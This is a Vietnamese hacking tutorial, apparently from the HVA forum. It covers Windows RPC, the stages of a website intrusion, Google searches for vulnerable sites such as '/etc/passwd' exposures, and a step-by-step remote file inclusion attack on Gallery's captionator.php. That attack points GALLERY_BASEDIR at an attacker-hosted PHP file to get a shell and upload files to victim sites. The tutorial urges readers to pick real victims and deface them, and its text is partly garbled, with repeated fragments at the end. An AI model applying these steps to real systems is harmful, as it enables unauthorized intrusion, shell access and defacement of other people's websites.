Đối với các hacker chuyên nghiệp thì họ sẽ không cần sử dụng những công cụ này mà họ sẽ trực tiếp setup phiên bản mà trang Web nạn nhân sử dụng trên máy của mình để test lỗi . Nhưng đối với các bạn mới “vào nghề” thì những công cụ này rất cần thiết , hãy sử dụng chúng một vài lần bạn sẽ biết cách phối hợp chúng để việc tìm ra lỗi trên các trang Web nạn nhân được nhanh chóng nhất .
Những hiểu biết để trở thành Hacker - Phần 26 ) Tìm hiểu RPC (Remote Procedure Call) : _ Windows NT cung cấp khả sử dụng RPC để thực thi ứng dụng phân tán Microsoft RPC bao gồm thư viện dịch vụ cho phép ứng dụng phân tán hoạt động môi trường Windows NT Các ứng dụng phân tán bao gồm nhiều tiến trình thực thi với nhiệm vụ xác định Các tiến trình chạy hay nhiều máy tính _Microsoft RPC sử dụng name service provider để định vị Servers mạng Microsoft RPC name service provider phải liền với Microsoft RPC name service interface (NIS) NIS bao bao gồm hàm API cho phép truy cập nhiều thực thể name service database (name service database chứa thực thể, nhóm thực thể, lịch sử thực thể Server) Khi cài đặt Windows NT, Microsoft Locator tự động chọn name service provider Nó name service provider tối ưu môi trường mạng Windows NT 27 ) Kỹ thuật đơn giản để chống lại xâm nhập trái phép online thông qua RPC (Remote Procedure Call) : _ Nếu bạn nghi ngờ máy có người xâm nhập bị admin remote desktop theo dõi , bạn cần tắt chức remote procedure call khơng có chương trình remote desktop để theo dõi bạn Nó cịn chống hầu hết tools xâm nhập vào máy ( đa số tools viết connect dựa remote procedure call ( over tcp/ip )).Các trojan đa số dựa vào giao thức Cách tắt: Bạn vào service /remote procedure call( click chuột phải ) chọn starup typt/disable manual/ apply Đây cách chống hữu hiệu với máy PC , thêm với cách tắt file sharing khó bị hack ) ,nhưng mạng LAN bạn phiền phức với khơng bạn khơng chạy chương trình có liên quan đến thiết bị Tùy theo cách thức bạn làm việc mà bạn có cách chọn lựa cho hợp lý Theo tơi dùng mạng LAN bạn cài firewall chắn tương đối an tồn ( Dựa theo viết huynh “Đời củ khoai ” khoaimi – admin HVA ) 28 ) Những bước để hack trang web : _ Theo liệt kê sách Hacking Exposed để hack trang Web thông thường ta thực bước sau : + FootPrinting : ( In dấu chân ) Đây cách mà hacker làm muốn lấy lượng thông tin tối đa máy chủ/doanh nghiệp/người dùng Nó bao gồm chi tiết địa IP, Whois, DNS v.v đại khái thong tin thức có lien quan đến mục tiêu Nhiều đơn giản hacker cần sử dụng công cụ tìm kiếm mạng để tìm thong tin + Scanning : ( Quét thăm dò ) Khi có thơng tin rồi, tiếp đến đánh giá định danh những dịch vụ mà mục tiêu có Việc bao gồm quét cổng, xác định hệ điều hành, v.v Các công cụ sử dụng nmap, WS pingPro, siphon, fscam cịn nhiều cơng cụ khác + Enumeration : ( liệt kê tìm lỗ hổng ) Bước thứ ba tìm kiếm tài nguyên bảo vệ kém, hoạch tài khoản người dùng mà sử dụng để xâm nhập Nó bao gồm mật mặc định, script dịch vụ mặc định Rât nhiều người quản trị mạng đến không sửa đổi lại giá trị + Gaining Access: ( Tìm cách xâm nhập ) Bây kẻ xâm nhập tìm cách truy cập vào mạng thơng tin có ba bước Phương pháp sử dụng cơng vào lỗi tràn đệm, lấy giải mã file password, hay thô thiển brute force (kiểm tra tất trường hợp) password Các công cụ thường sử dụng bước NAT, podium, L0pht + Escalating Privileges : ( Leo thang đặc quyền ) Ví dụ trường hợp hacker xâm nhập đựợc vào mạng với tài khoản guest, họ tìm cách kiểm sốt tồn hệ thống Hacker tìm cách ***** password admin, sử dụng lỗ hổng để leo thang đặc quyền John Riper hai chương trình crack password hay sử dụng + Pilfering : ( Dùng file chứa pass bị sơ hở ) Thêm lần máy tìm kiếm lại đựơc sử dụng để tìm phương pháp truy cập vào mạng Những file text chứa password hay chế khơng an tồn khác mồi ngon cho hacker + Covering Tracks : ( Xoá dấu vết ) Sau có thơng tin cần thiết, hacker tìm cách xố dấu vết, xố file log hệ điều hành làm cho người quản lý không nhận hệ thống bị xâm nhập có biêt khơng tìm kẻ xâm nhập + Creating ``Back Doors`` : ( Tạo cửa sau chuẩn bị cho lần xâm nhập dễ dàng ) Hacker để lại ``Back Doors``, tức chế cho phép hacker truy nhập trở lại đường bí mật khơng phải tốn nhiều cơng sức, việc cài đặt Trojan hay tạo user (đối với tổ chức có nhiều user) Cơng cụ loại Trojan, keylog… + Denial of Service (DoS) : ( Tấn công kiểu từ chối dịch vụ ) Nêu khơng thành cơng việc xâm nhập, DoS phương tiện cuối để công hệ thống Nếu hệ thống khơng cấu hình cách, bị phá vỡ cho phép hacker truy cập Hoặc trường hợp khác DoS làm cho hệ thống không hoạt động Các công cụ hay sử dụng để công DoS trin00, Pong Of Death, teardrop, loại nuker, flooder Cách lợi hại , sử dụng phổ biến _ Tuỳ theo hiểu biết trình độ mà hacker bỏ qua bước Không thiết phảI làm theo Các bạn nhớ đến câu “ biết người biết ta trăm trận trăm thắng ” ( Tài liệu HVA hackervn.net ) 29 ) Cách tìm Website bị lỗi : _ Chắc bạn biết đến trang Web chuyên dùng để tìm kiếm thông tin mạng ? Nhưng bạn khơng ngờ ta dùng trang để tìm trang Web bị lỗi ( Tôi thường dùng trang google.com khuyên bạn nên dùng trang mạnh hiệu ) _ Các bạn quan tâm đến lỗi trang Web muốn tìm chúng bạn cần vào google.com đánh đoạn lỗi vào sau “allinurl : ” VD ta có đoạn mã lỗi trang Web sau : cgi-bin/php.cgi?/etc/passwd bạn đánh : “allinurl:cgi-bin/php.cgi?/etc/passwd” Nó liệt kê trang Web bị lỗi cho bạn , bạn nhìn xuống mẫu liệt kê ( dòng địa màu xanh ) dòng viết y chang từ khố nhập vào trang bị lỗi Các bạn có xâm nhập vào hay khơng cịn tuỳ vào trang Web fix lỗi hay chưa _ Các bạn quan tâm đến lỗi forum , bạn muốn tìm forum dạng để thực tập , cần nhập từ khoá powered by VD sau để tìm forum dùng Snitz 2000 : powered by Snitz 2000 _ Tuy nhiên , việc tìm forum trang Web bị lỗi theo cách có xác suất không cao , bạn quan tâm đến đoạn string đặc biệt URL đặc trưng cho kiểu trang Web forum ( quan trọng , bạn tự tìm hiểu thêm ) VD tìm với lỗi Hosting Controller ta có đoạn đặc trưng sau ``/admin hay /advadmin hay /hosting`` ta đánh từ khoá : allinurl:/advadmin allinurl:/admin allinurl:/hosting Nó liệt kê trang Web có URL dạng : http://tentrangweb.com/advadmin http://tentrangweb.com/admin http://tentrangweb.com/hosting VD với forum UBB có đoạn đặc trưng ``cgi-bin/ultimatebb.cgi?`` Ta tìm tương tự Chỉ cần bạn biết cách tìm sau cần theo dõi thông tin cập nhật bên trang “Lỗi bảo mật” HVA bạn LeonHart post ngày bạn hiểu ý nghĩa chúng tự kiểm tra 30 ) Kỹ thuật hack Web thông qua lỗi Gallery ( dạng lỗi php code inject ): _ Gallery công cụ cho phép tạo gallery ảnh web viết PHP , lợi dụng sơ hở ta lợi dụng để viết thêm vào mã PHP cho phép ta upload , mục đích ta _ Trước hết bạn đăng ký host miễn phí , tốt bạn đăng ký brinkster.com cho dễ Sau bạn mở notepad tạo file PHP với đoạn mã sau : CODE Đoạn mã bạn tạo làm file có tên khác ( chung mã ) đặt tên : + shellphp.php : file dùng để chạy shell victim host + init.php : file dùng để upload lên trang có host bạn vừa tạo ( Bạn upload file init.php lên sớm ta cịn sử dụng với đoạn mã khác , bạn quên upload file lên tiêu ) Bạn tạo thêm file PHP với mã sau : CODE Bạn đặt tên upload.php , dùng để upload lên trang Web nạn nhân _ Tiếp theo Bạn vào Google, gõ ``Powered by gallery`` enter, Google liệt kê đống site sử dụng Gallery , bạn chọn lấy trang rồI dùng link sau để thử xem cịn mắc lỗI Gallery hay không : http:// trang Web nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ / Nếu bạn thấy lên ô hình chữ nhật phía , bên phải lệnh chuyển tiếp có chữ “Go” coi bạn tìm thấy đốI tượng Bây bạn gõ lệnh thơng qua chữ nhật để hack Web nạn nhân Trước hết bạn gõ lệnh “pwd” để xác định đường dẫn tuyệt đối đến thư mục thời nhấn nút “Go” , cho kết bạn nhanh chóng ghi lại đường dẫn phía dướI ( Tơi sử dụng VD đường dẫn tơi tìm thấy “/home/abc/xyz/gallery” ) Sau bạn đánh tiếp lệnh “|s –a|” để liệt kê thư mục Bây bạn nhìn kết , bạn thấy đống thư mục mà ta liệt kê Bạn ln nhớ mục đích tìm thư mục dùng để upload file upload.php mà ta chuẩn bị từ trước bạn xác định tơi cách nhìn vào chữ cuốI hàng kết : + Bạn loại bỏ trường hợp thư mục mà có dấu “.” “ ” thư mục gốc thư mục ảo ( Nó thường xếp hàng kết ) + Bạn loạI bỏ hàng có chữ cuối có gắn ( VD config.php , check.inc v.v… ) file khơng phải thư mục + Cịn lại thư mục upload tơi khun bạn nên chọn hàng chứa tên thư mục mà có chứa số lớn ( Bạn xác định chúng cách nhìn cột thứ từ trái sang ) , vừa chắn thư mục thư mục ảo , vừa làm cho admin trang Web khó phát ta cài file ta vào Tôi VD tơi phát thư mục “loveyou” có chứa 12 file cho ta upload , đường dẫn thức mà ta upload lên : /home/abc/xyz/Gallery/loveyou Bây bạn vào account host bạn, sửa nội dung file init.php giống mã file upload.php, sửa lại *PATH* thành “/home/abc/xyz/gallery/loveyou/ ” Đồng thời chuẩn bị file upload.php máy bạn với *PATH* “” ( dấu ngoặc kép ) Bây ta upload file upload.php lên trang Web nạn nhân , bạn nhập địa sau trình duyệt Web bạn : http:// trang Web nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ / Bạn thấy xuất tiếp khung hình chữ nhật bên cạnh có nút lệnh , nút “brown” , nút “upload” Nút “brown” bạn dùng để dẫn đến địa file upload.php bạn chuẩn bị máy bạn , nút “upload” bạn nhấn vào upload file upload.php lên trang Web nạn nhân Ok , coi bạn hồn thành chặng đường hack Web Từ bạn vận dụng để công đối thủ lấy database , password ( làm tương tự hướng dẫn hack trước ) , bạn nên thực tập đừng xoá database hay phá Web họ Nếu hacker chân bạn cần upload lên trang Web dòng chữ : “Hack by …… ” đủ Cũng lần trước , bạn có thành công hay không tuỳ thuộc vào may mắn kiên trì nghiên cứu vận dụng kiến thức bạn ( Dựa theo hướng dẫn hack huynh vnofear – viethacker.net ) GOODLUCK!!!!!!!!!!!! ( Hết phần ) Anhdenday HVA ... dàng ) Hacker để lại ``Back Doors``, tức chế cho phép hacker truy nhập trở lại đường bí mật khơng phải tốn nhiều công sức, việc cài đặt Trojan hay tạo user (đối với tổ chức có nhiều user) Cơng... Các bạn nhớ đến câu “ biết người biết ta trăm trận trăm thắng ” ( Tài liệu HVA hackervn.net ) 29 ) Cách tìm Website bị lỗi : _ Chắc bạn biết đến trang Web chuyên dùng để tìm kiếm thơng tin... sử dụng để tìm phương pháp truy cập vào mạng Những file text chứa password hay chế khơng an tồn khác mồi ngon cho hacker + Covering Tracks : ( Xố dấu vết ) Sau có thơng tin cần thiết, hacker tìm